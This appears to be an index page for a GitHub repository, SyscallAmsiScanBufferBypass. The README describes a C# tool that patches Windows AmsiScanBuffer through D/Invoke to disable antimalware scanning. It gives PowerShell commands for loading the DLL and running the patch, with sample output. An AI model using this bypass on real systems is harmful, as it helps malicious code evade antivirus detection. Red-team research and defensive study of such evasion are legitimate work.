Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
AmsiScanBufferBypass using D/Invoke
https://github.com/S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass
- Host: GitHub
- URL: https://github.com/S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass
- Owner: S3cur3Th1sSh1t
- Created: 2021-05-19T14:06:00.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-06-17T14:06:04.000Z (over 3 years ago)
- Last Synced: 2024-11-18T17:09:06.372Z (25 days ago)
- Language: C#
- Size: 77.1 KB
- Stars: 129
- Watchers: 5
- Forks: 19
- Open Issues: 0
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
- awesome-hacking-lists - S3cur3Th1sSh1t/SyscallAmsiScanBufferBypass - AmsiScanBufferBypass using D/Invoke (C#)
README
# SyscallAmsiScanBufferBypass
AmsiScanBuffer Patch using D/Invoke.
Credit goes to [RastaMouse's original work](https://github.com/rasta-mouse/AmsiScanBufferBypass).
I was just using [TheWover's D/Invoke](https://thewover.github.io/Dynamic-Invoke/) to port the `P/Invoke` functions to `D/Invoke`.
### C#
Can be compiled to a DLL and loaded via reflection, or included in a larger .NET Assembly (e.g. [SharpSploit](https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Evasion/Amsi.cs)).
```
PS C:\temp> add-type -Path .\SyscallBypass.dll
PS C:\temp> [Patch.bySyscall]::Patch()
[>] Manually mapping kernel32.dll into current process memory
Successfully allocated memory!
Successfully wrote PE header
Successfully wrote section .text
Successfully wrote section .rdata
Successfully wrote section .data
Successfully wrote section .pdata
Successfully wrote section .rsrc
Successfully wrote section .reloc
[>] Module Base : 24AFF3D0000
[>] Process Handle : 7FFF8DC60000
[>] Patch address : 7FFF8DC62420
[+] NtProtectVirtualMemory success, going to patch it now!
[>] Patching at address : 7FFF8DC62420
[+] NtProtectVirtualMemory set back to oldprotect!
```